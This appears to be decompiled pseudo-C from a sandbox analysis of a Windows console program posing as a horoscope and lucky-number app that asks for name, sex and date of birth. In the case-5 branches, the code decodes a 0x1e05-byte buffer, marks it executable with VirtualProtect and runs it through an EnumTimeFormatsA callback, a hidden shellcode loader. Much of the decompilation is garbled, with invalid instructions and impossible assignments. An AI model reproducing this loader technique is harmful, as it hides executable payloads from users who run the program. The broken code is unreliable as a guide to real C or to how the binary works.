																								__edx = __edi;
																								__edx = __edi * 0xb;
																								_push(__edx);
																								_push("YOUR LUCKY NUMBERS ARE: %d\t");
																								 *0x13fe250 = 0xc000a;
																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __edi;
																								__eax = __edi * __edi;
																								asm("cdq");
																								__ecx = 0xa;
																								_t373 = __eax % 0xa;
																								__eax = __eax / 0xa;
																								__edx = _t373;
																								_push(__edx);
																								_push("%d\t");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								 &(__edi[__edi]) =  &(__edi[__edi]) +  &(__edi[__edi]);
																								__ecx =  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]) +  &(__edi[__edi]);
																								__eax = 0x38e38e39;
																								__edx = 0x38e38e39 * __ecx >> 0x20;
																								__eax = 0x38e38e39 * __ecx;
																								__edx = 0x38e38e39 * __ecx >> 0x20 >> 1;
																								__edx = __edx >> 0x1f;
																								__eax = __edx + (__edx >> 0x1f);
																								_push(__edx + (__edx >> 0x1f));
																								_push("%d\t");
																								E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
																								__edx = 0x2aaaaaab * __edi >> 0x20;
																								0x2aaaaaab * __edi = __edx;
																								__eax = __edx >> 0x1f;
																								__eax = __edx + (__edx >> 0x1f);
																								__eax + __eax * 2 = __eax + __eax * 2 + __eax + __eax * 2;
																								_push(__eax + __eax * 2 + __eax + __eax * 2);
																								_push("%d\t");
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								_push("Enter any key to continue...");
																								 *0x13fe250 = 0x160032;
																								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = 0x38 + __esp;
																								__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																								goto L159;
																							case 3:
																								__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																								__ecx = _v0;
																								__edx = __esi;
																								E013D1C00(__ebx, __esi, __edi, __esi, __eflags, __ecx, __ebx) = E013D1AD0();
																								__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																								__eax = __eax - 1;
																								__eflags = __eax - 0xb;
																								if(__eflags <= 0) {
																									switch( *((intOrPtr*)(__eax * 4 +  &M013D7808))) {
																										case 0:
																											goto L146;
																										case 1:
																											goto L147;
																										case 2:
																											goto L148;
																										case 3:
																											goto L149;
																										case 4:
																											goto L150;
																										case 5:
																											goto L151;
																										case 6:
																											goto L152;
																										case 7:
																											goto L153;
																										case 8:
																											goto L154;
																										case 9:
																											goto L155;
																										case 0xa:
																											goto L156;
																										case 0xb:
																											goto L157;
																									}
																								}
																								goto L159;
																							case 4:
																								_push(E013DB07D());
																								__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																								__esp = __esp + 4;
																								__eax = E013D1E40(__edi);
																								goto L159;
																							case 5:
																								__eax = E013DC543(0);
																								_push(__edi);
																								if(__eflags >= 0) {
																									L170:
																									if(__eflags > 0) {
																										__eflags = __eax - 0x3d76c001;
																										__esp = __esp + __ecx;
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										asm("int3");
																										_push(__ebp);
																										__ebp = __esp;
																										__esp = __esp - 0x20;
																										goto L173;
																									}
																								} else {
																									__edx[0x1c] = __edx[0x1c] + __eax;
																									__eflags = __eax - 0x3d726a01;
																									 *((intOrPtr*)(__eax + 0x73)) =  *((intOrPtr*)(__eax + 0x73)) + __eax;
																									__eflags = __eax - 0x3d770a01;
																									__eax = __eax + __ebp;
																									__eflags = __eax;
																									if(__eax > 0) {
																										L173:
																										asm("in al, dx");
																										_t435 = __ebx + 0x57;
																										 *_t435 =  *(__ebx + 0x57) & __dl;
																										__eflags =  *_t435;
																										_push("cls");
																										goto L174;
																									} else {
																										 *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) =  *((intOrPtr*)(__ebx + 0x3d + __esi * 2)) + __esi;
																										__ecx = __ecx + __eax;
																										__eflags = __ecx;
																										if(__ecx >= 0) {
																											L174:
																											__eax = __eax + __ebp;
																											asm("invalid");
																											goto L175;
																										} else {
																											 *__esi =  *__esi + __ecx;
																											__eflags =  *__esi;
																											if( *__esi == 0) {
																												L175:
																												 *__eax =  *__eax + __al;
																												__eflags =  *__eax;
																												__edi = _v8;
																												_push(__edi);
																												_push("Name: %s");
																												 *0x13fe250 = 0x30037;
																												goto L176;
																											} else {
																												 *((intOrPtr*)(__ebx + 0x74)) =  *((intOrPtr*)(__ebx + 0x74)) + __ebx;
																												__eflags = __eax - 0x3d74a801;
																												__ebp = __esi + __ebp;
																												__eflags = __ebp;
																												if(__ebp == 0) {
																													L176:
																													__eax = __eax + 0x13fe250;
																													asm("aaa");
																													 *__ebx =  *__ebx + __al;
																													__al = __al + __ch;
																													__eflags = __al;
																													__eax =  *__ecx;
																													goto L177;
																												} else {
																													__edx[0x1d] = __edx[0x1d] + __eax;
																													__eflags = __eax - 0x3d758f01;
																													__esp = __esp + __ebx;
																													__eflags = __esp;
																													if(__esp != 0) {
																														L177:
																														 *__eax =  *__eax + __al;
																														__eflags =  *__eax;
																														__ebx = _v12;
																														goto L178;
																													} else {
																														 *__ecx =  *__ecx + __ebp;
																														__eflags =  *__ecx;
																														if( *__ecx <= 0) {
																															L178:
																															__al = __al | 0x000000b8;
																															asm("fiadd dword [edi]");
																															 *__eax =  *__eax + __al;
																															__eax = __eax - __ebx;
																															__eflags = __eax;
																															_push(__eax);
																															_push("Age=%d");
																															 *0x13fe250 = 0x40037;
																															_v40 = __eax;
																															__eax = _v4;
																															 *0x13fe250 = 0x50037;
																															_v44 = _v4;
																															__eax = E013DC111(_v4);
																															_push(__eax);
																															_push("Sex=%c");
																														} else {
																															_t433 =  &(__esi[0x1d]);
																															 *_t433 = __esi + __esi[0x1d];
																															__eflags =  *_t433;
																															goto L170;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								__eax = __eax + __ebp;
																								__edi =  &(__edi[0]);
																								__ecx = __ecx + 1;
																								 *__eax =  *__eax + __al;
																								__esp = 0x20 + __esp;
																								__eax = E013D1B10();
																								_v52 = "\n*  You are kind and gullible.";
																								_v48 = "\n*  You cannot hurt anyone directly.";
																								_v44 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
																								__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																								__eax = __eax - 1;
																								__eflags = __eax - 5;
																								if(__eflags > 0) {
																									L210:
																									_push("    THE SYSTEM WILL RESTART IN FEW SECONDS!!!");
																									__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																									__esp = __esp + 4;
																									__eax =  *0x13d0000();
																									_pop(__edi);
																									_pop(__ebx);
																									return __eax;
																								} else {
																									_push(__esi);
																									__esi = _v12;
																									do {
																										switch( *((intOrPtr*)(__eax * 4 +  &M013D7F60))) {
																											case 0:
																												E013DB418(__ebx, __edx, __eflags, "cls") = _v0;
																												__edx = __edi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1B10();
																												_push("HERE IS WHAT YOU ARE!!!\n");
																												 *0x13fe250 = 0x80001;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = __esp + 0x10;
																												 *0x13fe250 = 0x90001;
																												__eflags = __esi - 0xa;
																												if(__esi <= 0xa) {
																													_v8 = __esi;
																													__eax = __esi;
																												} else {
																													__eax = 0x66666667;
																													__edx = 0x66666667 * __esi >> 0x20;
																													__eax = 0x66666667 * __esi;
																													__edx = 0x66666667 * __esi >> 0x20 >> 2;
																													__eax = __edx + (__edx >> 0x1f);
																													__edx = __eax + __eax * 4;
																													__edx = __eax + __eax * 4 + __eax + __eax * 4;
																													__eax = __esi;
																													__eax = __esi - __edx;
																													_v8 = __eax;
																												}
																												__eflags = __eax;
																												if(__eax == 0) {
																													_v8 = 5;
																													__eax = _v8;
																												}
																												_v24 = __eax;
																												__eax = __eax + __eax;
																												__eax = __eax + __eax;
																												__eflags = __eax;
																												__eax = __ebp + __eax - 0x24;
																												_v32 = 1;
																												_v28 = __eax;
																												while(1) {
																													__eflags = _v24 - 0x36;
																													if(__eflags > 0) {
																														break;
																													}
																													__ecx = _v28;
																													__edx =  *_v28;
																													_push(__edx);
																													_push("\n\n%s");
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push("\nEnter any key....");
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__esp = __esp + 0xc;
																													__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																													__ecx = _v8;
																													_v24 =  &(_v24[__ecx]);
																													__eax = _v32;
																													__ecx = __ecx + __ecx;
																													_v28 =  &(_v28[__ecx]);
																													__eax =  &(_v32[1]);
																													_v32 = __eax;
																													__eflags = __eax - 6;
																													if(__eflags < 0) {
																														continue;
																													}
																													break;
																												}
																												_push("\n\n\nWE HOPE THAT IT WAS HELPFUL");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("\n\n\n\n\nEnter any key.....");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 8 + __esp;
																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																												goto L208;
																											case 1:
																												E013DB418(__ebx, __edx, __eflags, "cls") = _v0;
																												__edx = __edi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1B10();
																												__eax = E013D11C0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
																												goto L208;
																											case 2:
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__ecx = _v0;
																												__edx = __edi;
																												E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _v0, __ebx) = E013D1B10();
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x80005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x100005;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esi + __esi * 2 = __esi + __esi * 2 + __esi + __esi * 2;
																												__ecx = __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2 + __esi + __esi * 2;
																												__eax = 0x66666667;
																												__edx = 0x66666667 * __ecx >> 0x20;
																												__eax = 0x66666667 * __ecx;
																												__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																												__edx = __edx >> 0x1f;
																												__eax = __edx + (__edx >> 0x1f);
																												_push(__edx + (__edx >> 0x1f));
																												_push("YOUR LUCKY NUMBERS ARE: %d\t");
																												 *0x13fe250 = 0xc000a;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esi = __esi * __esi;
																												__ecx = __esi * __esi - 9;
																												_push(__esi * __esi - 9);
																												_push("%d\t");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ecx = __esi;
																												__ecx = __esi * 0x2d;
																												__eax = 0x66666667;
																												__edx = 0x66666667 * __ecx >> 0x20;
																												__eax = 0x66666667 * __ecx;
																												__edx = 0x66666667 * __ecx >> 0x20 >> 2;
																												__edx = __edx >> 0x1f;
																												__eax = __edx + (__edx >> 0x1f);
																												_push(__edx + (__edx >> 0x1f));
																												_push("%d\t");
																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = 0x2aaaaaab;
																												__edx = 0x2aaaaaab * __esi >> 0x20;
																												0x2aaaaaab * __esi = __edx;
																												__eax = __edx >> 0x1f;
																												__eax = __edx + (__edx >> 0x1f);
																												__ecx = __eax + __eax * 2;
																												__esi = __esi - __eax + __eax * 2;
																												__edx = __esi - __eax + __eax * 2 + __esi - __eax + __eax * 2;
																												_push(__edx);
																												_push("%d\t");
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("Enter any key to continue...");
																												 *0x13fe250 = 0x160032;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = 0x38 + __esp;
																												__eax = E013EDBFD(__ebx, __edi, __esi, __eflags);
																												goto L208;
																											case 3:
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												__edx = _v0;
																												__edx = __edi;
																												E013D1C00(__ebx, __edi, __edi, __esi, __eflags, _v0, __ebx) = E013D1B10();
																												__eax = E013D1D50(__ebx, __ecx, __edi, __esi, __eflags);
																												__eax = __eax - 1;
																												__eflags = __eax - 0xb;
																												if(__eflags <= 0) {
																													switch( *((intOrPtr*)(__eax * 4 +  &M013D7F78))) {
																														case 0:
																															goto L195;
																														case 1:
																															goto L196;
																														case 2:
																															goto L197;
																														case 3:
																															goto L198;
																														case 4:
																															goto L199;
																														case 5:
																															goto L200;
																														case 6:
																															goto L201;
																														case 7:
																															goto L202;
																														case 8:
																															goto L203;
																														case 9:
																															goto L204;
																														case 0xa:
																															goto L205;
																														case 0xb:
																															goto L206;
																													}
																												}
																												goto L208;
																											case 4:
																												_push(E013DB07D());
																												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																												__esp = __esp + 4;
																												__eax = E013D1E40(__edi);
																												goto L208;
																											case 5:
																												__eax = E013DC543(0);
																												asm("out 0x78, eax");
																												__eflags = __eax - 0x3d79d201;
																												__edx = __edx + __edi;
																												__eflags = __edx;
																												if(__edx >= 0) {
																													L223:
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													asm("int3");
																													goto L224;
																												} else {
																													__ecx = __ecx + __esp;
																													__eflags = __ecx;
																													if(__ecx != 0) {
																														L224:
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_push(__ebp);
																														__ebp = __esp;
																														__esp = __esp - 0x20;
																														goto L226;
																													} else {
																														_t523 = __ebx + 0x59013d7e;
																														 *_t523 =  *(__ebx + 0x59013d7e) + __ebp;
																														__eflags =  *_t523;
																														_pop(__ecx);
																														if(__eflags > 0) {
																															L226:
																															asm("in al, dx");
																															_v950997971 = _v950997971 & __cl;
																															__ebp =  &_v23;
																															__eflags = __ebp;
																															goto L227;
																														} else {
																															 *0x62013d7b = __edx +  *0x62013d7b;
																															__eflags =  *0x62013d7b;
																															if(__eflags != 0) {
																																L227:
																																asm("in al, dx");
																																_push(__edx);
																																if(__eflags < 0) {
																																	goto L242;
																																} else {
																																	if(__eflags < 0) {
																																		goto L218;
																																	} else {
																																		__ebp =  &_v23;
																																		asm("lock jz 0x37");
																																		goto L230;
																																	}
																																}
																															} else {
																																_t525 = __edi - 0x3fec285;
																																 *_t525 =  *(__edi - 0x3fec285) + __ebp;
																																__eflags =  *_t525;
																																if(__eflags != 0) {
																																	L230:
																																	if(__eflags == 0) {
																																		goto L238;
																																	} else {
																																		 *[fs:ebp-0xc] = 0x6c6c;
																																		goto L232;
																																	}
																																} else {
																																	_t527 = __ecx + 0x7c;
																																	 *_t527 =  *(__ecx + 0x7c) + __ecx;
																																	__eflags =  *_t527;
																																	L218:
																																	if(__eflags < 0) {
																																		L232:
																																		_v36 = 0x6c6c;
																																		_v34 = 0;
																																		goto L233;
																																	} else {
																																		_t529 = __esi - 0x1cfec284;
																																		 *_t529 = __edx +  *(__esi - 0x1cfec284);
																																		__eflags =  *_t529;
																																		if( *_t529 < 0) {
																																			L233:
																																			__eflags =  *__eax & 0x000000ff;
																																			asm("adc eax, 0x13ef008");
																																			goto L234;
																																		} else {
																																			 *__eax = __esi +  *__eax;
																																			__eflags =  *__eax;
																																			if( *__eax >= 0) {
																																				L234:
																																				__al = __al | __dh;
																																				 *[ds:eax+0x24] =  *[ds:eax+0x24] + __ebp;
																																				__eflags =  *[ds:eax+0x24];
																																				if( *[ds:eax+0x24] != 0) {
																																					goto L241;
																																				} else {
																																					 *(__eax - 1) =  *(__eax - 1) + __edx;
																																					asm("adc eax, 0x13ef004");
																																					goto L236;
																																				}
																																			} else {
																																				_a101 = _a101 + __edi;
																																				__eflags = __eax - 0x3d7dca01;
																																				 *__edi = __edx +  *__edi;
																																				__eflags =  *__edi;
																																				if( *__edi <= 0) {
																																					L236:
																																					__al = __al + 0xf0;
																																					 *[ds:ebp+0x6a51fc4d] =  *[ds:ebp+0x6a51fc4d] + __ecx;
																																					__edx[0] = __edx[0] + __ch;
																																					_push(0);
																																					_push(2);
																																					_push(0); // executed
																																					__eax =  *__eax(); // executed
																																					__eflags = __eax;
																																					if(__eflags != 0) {
																																						__eflags = __eax - 0x57;
																																						L238:
																																						_push(__edi);
																																						if(__eflags == 0) {
																																							__eax = 0;
																																							__eflags = 0;
																																							L240:
																																							_t545 = 0x13fb408 + __eax; // 0x170ce9
																																							 *_t545 =  *_t545 + __al;
																																							 ~( *_t545 + __al) =  ~( *_t545 + __al) ^ 0x00000028;
																																							0xd2 = 0xd2 - ( ~( *_t545 + __al) ^ 0x00000028);
																																							0x000000d2 - ( ~( *_t545 + __al) ^ 0x00000028) ^ __al = (0x000000d2 - ( ~( *_t545 + __al) ^ 0x00000028) ^ __al) - __al;
																																							__cl =  !((0x000000d2 - ( ~( *_t545 + __al) ^ 0x00000028) ^ __al) - __al);
																																							__cl =  !((0x000000d2 - ( ~( *_t545 + __al) ^ 0x00000028) ^ __al) - __al) + 0x7e;
																																							asm("ror cl, 0x2");
																																							L241:
																																							__esp = __ebp;
																																							_pop(__ebp);
																																							__cl = __cl +  *((intOrPtr*)(__eax + 0x3fb40888));
																																							_t547 = 0x3d + __eax;
																																							 *_t547 =  *(0x3d + __eax) + __eax;
																																							__eflags =  *_t547;
																																							L242:
																																							__eax = __eax + 1;
																																							__eflags = __eax - 0x1e05;
																																							if(__eflags < 0) {
																																								goto L240;
																																							}
																																							__edx =  &_v32;
																																							__eax = VirtualProtect(0x13fb408, 0x1e05, 0x40, __edx); // executed
																																							__eax = EnumTimeFormatsA(0x13fb408, 0, 0); // executed
																																						}
																																					}
																																				} else {
																																					 *((intOrPtr*)(__ecx + 0x7e)) =  *((intOrPtr*)(__ecx + 0x7e)) + __esp;
																																					__eflags = __eax - 0xcccccc01;
																																					goto L223;
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																												_push(__esi);
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												_push("just enter your date of birth");
																												 *0x13fe250 = 0x12002d;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("YEAR: ");
																												 *0x13fe250 = 0x13002d;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ecx =  &_v56;
																												__eax = E013DB060("%d",  &_v56);
																												_push("MONTH: ");
																												 *0x13fe250 = 0x14002d;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ecx =  &_v52;
																												__eax = E013DB060("%d",  &_v52);
																												_push("DAY: ");
																												 *0x13fe250 = 0x15002d;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												__ecx =  &_v48;
																												__eax = E013DB060("%d",  &_v48);
																												_push(E013DB07D());
																												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																												__eax = _v52;
																												__esp = 0x30 + __esp;
																												__eflags = __eax - 0xc;
																												if(__eflags > 0) {
																													L251:
																													__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																													_push("THE ENTRY YOU MADE WAS WRONG.....");
																													 *0x13fe250 = 0xa001e;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push("PLEASE ENTER CORRECT DATE OF BIRTH ACCORDING TO GREGORIAN CALENDAR");
																													 *0x13fe250 = 0xb000a;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push("just enter your date of birth");
																													 *0x13fe250 = 0x12002d;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push("YEAR: ");
																													 *0x13fe250 = 0x13002d;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__ecx =  &_v56;
																													__eax = E013DB060("%d",  &_v56);
																													_push("MONTH: ");
																													 *0x13fe250 = 0x14002d;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__ecx =  &_v52;
																													__eax = E013DB060("%d",  &_v52);
																													_push("DAY: ");
																													 *0x13fe250 = 0x15002d;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__ecx =  &_v48;
																													__eax = E013DB060("%d",  &_v48);
																													_push(E013DB07D());
																													__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																													__ecx = _v48;
																													__eax = _v52;
																													__edx = _v56;
																													__esp = 0x38 + __esp;
																												} else {
																													__ecx = _v48;
																													__eflags = __eax - 2;
																													if(__eax != 2) {
																														L247:
																														__eflags = __ecx - 0x1f;
																														if(__eflags > 0) {
																															goto L251;
																														} else {
																															__eflags = __ecx - 0x1e;
																															if(__eflags > 0) {
																																goto L251;
																															} else {
																																__edx = _v56;
																																__esi = 0x7da;
																																__esi = 0x7da - __edx;
																																__eflags = 0x7da - 0x64;
																																if(0x7da > 0x64) {
																																	goto L251;
																																} else {
																																	__eflags = __edx - 0x7da;
																																	if(__eflags > 0) {
																																		goto L251;
																																	}
																																}
																															}
																														}
																													} else {
																														__eflags = __ecx - 0x1e;
																														if(__eflags >= 0) {
																															goto L251;
																														} else {
																															goto L247;
																														}
																													}
																												}
																												__eflags = __eax - 0xc;
																												if(__eflags > 0) {
																													L259:
																													_push("WRONG ENTRY");
																													 *0x13fe250 = 0x16002d;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push(3);
																													_push("THE PROGRAM RESTARTS IN %d SECONDS");
																													 *0x13fe250 = 0x170026;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push(2);
																													_push("THE PROGRAM RESTARTS IN %d SECONDS");
																													 *0x13fe250 = 0x170026;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push(1);
																													_push("THE PROGRAM RESTARTS IN %d SECONDS");
																													 *0x13fe250 = 0x170026;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													_push(0);
																													_push("THE PROGRAM RESTARTS IN %d SECONDS");
																													 *0x13fe250 = 0x170026;
																													__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																													__esp = 0x24 + __esp;
																													__eax =  *0x13d0000();
																													__ecx = _v48;
																													__eax = _v52;
																													__edx = _v56;
																												} else {
																													__eflags = __eax - 2;
																													if(__eax != 2) {
																														L255:
																														__eflags = __ecx - 0x1f;
																														if(__eflags > 0) {
																															goto L259;
																														} else {
																															__eflags = __ecx - 0x1e;
																															if(__eflags > 0) {
																																goto L259;
																															} else {
																																__esi = 0x7da;
																																__esi = 0x7da - __edx;
																																__eflags = 0x7da - 0x64;
																																if(0x7da > 0x64) {
																																	goto L259;
																																} else {
																																	__eflags = __edx - 0x7da;
																																	if(__eflags > 0) {
																																		goto L259;
																																	}
																																}
																															}
																														}
																													} else {
																														__eflags = __ecx - 0x1e;
																														if(__eflags >= 0) {
																															goto L259;
																														} else {
																															goto L255;
																														}
																													}
																												}
																												 *0x13fe244 = __edx;
																												 *0x13fe248 = __eax;
																												 *0x13fe24c = __ecx;
																												__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																												_push("REGISTRY DETAILS");
																												 *0x13fe250 = 0x5000c;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x6000c;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("------------------------------------------------------------------");
																												 *0x13fe250 = 0x9000c;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push("Enter Full Name:  ");
																												 *0x13fe250 = 0x70011;
																												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																												_push(E013DB07D());
																												__eax = E013DB3BC(__ebx, __edx, __edi, __esi, __eflags);
																												_push("Enter Sex:  ");
																												 *0x13fe250 = 0x80011;
																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013DC5B8();
																												_push("press any key to continue.....");
																												 *0x13fe242 = __al;
																												 *0x13fe250 = 0x170032;
																												E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = E013EDBFD(__ebx, __edi, __esi, __eflags);
																												__eax = E013DBB6E("records.txt", 0x13f7b64);
																												_pop(__esi);
																												__eflags = __eax;
																												if(__eflags == 0) {
																													__eax = E013DC543(__eax);
																												}
																												_push(__eax);
																												_push(1);
																												_push(0x40);
																												_push(0x13fe210);
																												__eax = E013DBF81(__ebx, __edx, __edi, __esi, __eflags);
																												__eax = _v52;
																												__esp = __esp + 0x10;
																												__eflags = __eax - 3;
																												if(__eax != 3) {
																													__eflags = __eax - 4;
																													if(__eax != 4) {
																														goto L271;
																													} else {
																														__eax = _v48;
																														__eflags = __eax - 0x13;
																														if(__eflags > 0) {
																															goto L269;
																														} else {
																															goto L267;
																														}
																													}
																												} else {
																													__eax = _v48;
																													__eflags = __eax - 0x15;
																													if(__eflags >= 0) {
																														L267:
																														__ecx =  *0x13fe242 & 0x000000ff;
																														__edx = _v56;
																														_push(__ecx);
																														_push(0x13fe210);
																														_push(_v56);
																														_push(__eax);
																														__eax = E013D2710(__ebx, __ecx, __edi, __esi, __eflags);
																														__eax = _v52;
																														__esp = __esp + 0x10;
																														__eflags = __eax - 4;
																														if(__eax != 4) {
																															L271:
																															__eflags = __eax - 5;
																															if(__eax != 5) {
																																goto L277;
																															} else {
																																__eax = _v48;
																																__eflags = __eax - 0x14;
																																if(__eflags > 0) {
																																	goto L275;
																																} else {
																																	goto L273;
																																}
																															}
																														} else {
																															__eax = _v48;
																															L269:
																															__eflags = __eax - 0x14;
																															if(__eflags >= 0) {
																																L273:
																																__ecx =  *0x13fe242 & 0x000000ff;
																																__edx = _v56;
																																_push(__ecx);
																																_push(0x13fe210);
																																_push(_v56);
																																_push(__eax);
																																__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags);
																																__eax = _v52;
																																__esp = __esp + 0x10;
																																__eflags = __eax - 5;
																																if(__eax != 5) {
																																	L277:
																																	__eflags = __eax - 6;
																																	if(__eax != 6) {
																																		goto L283;
																																	} else {
																																		__eax = _v48;
																																		__eflags = __eax - 0x14;
																																		if(__eflags > 0) {
																																			goto L281;
																																		} else {
																																			goto L279;
																																		}
																																	}
																																} else {
																																	__eax = _v48;
																																	L275:
																																	__eflags = __eax - 0x15;
																																	if(__eflags >= 0) {
																																		L279:
																																		__ecx =  *0x13fe242 & 0x000000ff;
																																		__edx = _v56;
																																		_push(__ecx);
																																		_push(0x13fe210);
																																		_push(_v56);
																																		_push(__eax);
																																		__eax = E013D3610(__ebx, __ecx, __edi, __esi, __eflags);
																																		__eax = _v52;
																																		__esp = __esp + 0x10;
																																		__eflags = __eax - 6;
																																		if(__eax != 6) {
																																			L283:
																																			__eflags = __eax - 7;
																																			if(__eax != 7) {
																																				goto L289;
																																			} else {
																																				__eax = _v48;
																																				__eflags = __eax - 0x16;
																																				if(__eflags > 0) {
																																					goto L287;
																																				} else {
																																					goto L285;
																																				}
																																			}
																																		} else {
																																			__eax = _v48;
																																			L281:
																																			__eflags = __eax - 0x15;
																																			if(__eflags >= 0) {
																																				L285:
																																				__ecx =  *0x13fe242 & 0x000000ff;
																																				__edx = _v56;
																																				_push(__ecx);
																																				_push(0x13fe210);
																																				_push(_v56);
																																				_push(__eax);
																																				__eax = E013D3D40(__ebx, __ecx, __edi, __esi, __eflags);
																																				__eax = _v52;
																																				__esp = __esp + 0x10;
																																				__eflags = __eax - 7;
																																				if(__eax != 7) {
																																					L289:
																																					__eflags = __eax - 8;
																																					if(__eax != 8) {
																																						goto L295;
																																					} else {
																																						__eax = _v48;
																																						__eflags = __eax - 0x16;
																																						if(__eflags > 0) {
																																							goto L293;
																																						} else {
																																							goto L291;
																																						}
																																					}
																																				} else {
																																					__eax = _v48;
																																					L287:
																																					__eflags = __eax - 0x17;
																																					if(__eflags >= 0) {
																																						L291:
																																						__ecx =  *0x13fe242 & 0x000000ff;
																																						__edx = _v56;
																																						_push(__ecx);
																																						_push(0x13fe210);
																																						_push(_v56);
																																						_push(__eax);
																																						__eax = E013D4490(__ebx, __ecx, __edi, __esi, __eflags);
																																						__eax = _v52;
																																						__esp = __esp + 0x10;
																																						__eflags = __eax - 8;
																																						if(__eax != 8) {
																																							L295:
																																							__eflags = __eax - 9;
																																							if(__eax != 9) {
																																								goto L301;
																																							} else {
																																								__eax = _v48;
																																								__eflags = __eax - 0x16;
																																								if(__eflags > 0) {
																																									goto L299;
																																								} else {
																																									goto L297;
																																								}
																																							}
																																						} else {
																																							__eax = _v48;
																																							L293:
																																							__eflags = __eax - 0x17;
																																							if(__eflags >= 0) {
																																								L297:
																																								__ecx =  *0x13fe242 & 0x000000ff;
																																								__edx = _v56;
																																								_push(__ecx);
																																								_push(0x13fe210);
																																								_push(_v56);
																																								_push(__eax);
																																								__eax = E013D4BE0(__ebx, __ecx, __edi, __esi, __eflags);
																																								__eax = _v52;
																																								__esp = __esp + 0x10;
																																								__eflags = __eax - 9;
																																								if(__eax != 9) {
																																									L301:
																																									__eflags = __eax - 0xa;
																																									if(__eax != 0xa) {
																																										goto L307;
																																									} else {
																																										__eax = _v48;
																																										__eflags = __eax - 0x16;
																																										if(__eflags > 0) {
																																											goto L305;
																																										} else {
																																											goto L303;
																																										}
																																									}
																																								} else {
																																									__eax = _v48;
																																									L299:
																																									__eflags = __eax - 0x17;
																																									if(__eflags >= 0) {
																																										L303:
																																										__ecx =  *0x13fe242 & 0x000000ff;
																																										__edx = _v56;
